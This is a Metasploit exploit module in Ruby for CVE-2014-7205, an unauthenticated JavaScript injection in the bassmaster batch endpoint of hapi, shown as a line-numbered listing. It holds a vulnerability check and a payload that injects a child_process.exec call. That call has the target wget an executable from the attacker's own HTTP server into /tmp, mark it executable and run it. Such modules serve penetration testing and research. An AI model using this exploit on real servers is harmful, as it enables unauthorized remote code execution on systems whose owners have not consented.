Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::Remote::HttpServer
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::FileDropper
13

14
  def initialize(info = {})
15
    super(update_info(info,
16
      'Name'           => 'Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution',
17
      'Description'    => %q{
18
        This module exploits an un-authenticated code injection vulnerability in the bassmaster
19
        nodejs plugin for hapi. The vulnerability is within the batch endpoint and allows an
20
        attacker to dynamically execute JavaScript code on the server side using an eval.
21

22
        Note that the code uses a '\x2f' character so that we hit the match on the regex.
23
      },
24
      'Author'         =>
25
        [
26
          'mr_me <[email protected]>',      # msf
27
          'Jarda Kotesovec'                            # original bug finder
28
        ],
29
      'References'  =>
30
        [
31
          [ 'CVE', '2014-7205'],
32
          [ 'URL', 'https://nodesecurity.io/advisories/bassmaster_js_injection'],        # nodejs advisory
33
        ],
34
      'License'        => MSF_LICENSE,
35
      'Platform'    => ['linux', 'bsd'],                                                 # binary > native JavaScript
36
      'Arch'        => [ARCH_X86, ARCH_X64],
37
      'Privileged'     => false,
38
      'Targets'     =>
39
        [
40
          [ 'Bassmaster <= 1.5.1', {} ]                                                  # Other versions are also affected
41
        ],
42
      'DefaultTarget' => 0,
43
      'DisclosureDate' => '2016-11-01'))
44
    register_options(
45
      [
46
        Opt::RPORT(8080),                                                                # default port for the examples/batch.js file
47
        OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/batch"]), # default route for the examples/batch.js file
48
        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
49
      ])
50
  end
51

52
  def check
53

54
    # So if we can append an encapsulated string into the body
55
    # we know that we can execute arbitrary JavaScript code
56
    rando  = rand_text_alpha(8+rand(8))
57
    check  = "+'#{rando}'"
58

59
    # testing
60
    requests = [
61
      {:method => "get", :path => "/profile"},
62
      {:method => "get", :path => "/item"},
63
      {:method => "get", :path => "/item/$1.id#{check}"}, # need to match this /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g;
64
    ]
65

66
    post = {:requests => requests}
67

68
    res = send_request_cgi({
69
      'method' => 'POST',
70
      'uri'    => normalize_uri(datastore['URIPATH']),
71
      'ctype' => 'application/json',
72
      'data'   => post.to_json
73
    })
74

75
    # default example app
76
    if res and res.code == 200 and res.body =~ /#{rando}/
77
      return CheckCode::Vulnerable
78

79
    # non-default app
80
    elsif res and res.code == 500 and res.body =~ /#{rando}/
81
      return CheckCode::Appears
82
    end
83

84
    return CheckCode::Safe
85
  end
86

87
  def on_request_uri(cli, request)
88
    if (not @pl)
89
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
90
      return
91
    end
92
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
93
    @elf_sent = true
94
    send_response(cli, @pl)
95
  end
96

97
  def send_payload
98
    @bd = rand_text_alpha(8+rand(8))
99
    pn  = rand_text_alpha(8+rand(8))
100
    register_file_for_cleanup("/tmp/#{@bd}")
101
    cmd  = "wget #{@service_url} -O \\x2ftmp\\x2f#{@bd};"
102
    cmd << "chmod 755 \\x2ftmp\\x2f#{@bd};"
103
    cmd << "\\x2ftmp\\x2f#{@bd}"
104
    pay = ";require('child_process').exec('#{cmd}');"
105

106
    # pwning
107
    requests = [
108
      {:method => "get", :path => "/profile"},
109
      {:method => "get", :path => "/item"},
110
      {:method => "get", :path => "/item/$1.id#{pay}"}, # need to match this /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g;
111
    ]
112

113
    post = {:requests => requests}
114

115
    res = send_request_cgi({
116
      'method' => 'POST',
117
      'uri'    => normalize_uri(datastore['URIPATH']),
118
      'ctype' => 'application/json',
119
      'data'   => post.to_json
120
    })
121

122
    # default example app
123
    if res and res.code == 200 and res.body =~ /id/
124
      return true
125

126
    # incase we are not targeting the default app
127
    elsif res and res.code == 500 and res.body !=~ /id/
128
      return true
129
    end
130
    return false
131
  end
132

133
  def start_http_server
134
    @pl = generate_payload_exe
135
    @elf_sent = false
136
    downfile = rand_text_alpha(8+rand(8))
137
    resource_uri = "\\x2f#{downfile}"
138
    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
139
      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
140
    else
141
      srv_host = datastore['SRVHOST']
142
    end
143

144
    @service_url = "http:\\x2f\\x2f#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
145
    service_url_payload = srv_host + resource_uri
146
    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
147
    start_service({'Uri' => {
148
      'Proc' => Proc.new { |cli, req|
149
        on_request_uri(cli, req)
150
      },
151
      'Path' => resource_uri
152
    },
153
    'ssl' => false # do not use SSL
154
    })
155

156
    connect
157
  end
158

159
  def exploit
160
      start_http_server
161
      if send_payload
162
        print_good("Injected payload")
163
        # we need to delay, for the stager
164
        select(nil, nil, nil, 5)
165
      end
166
  end
167
end
168

169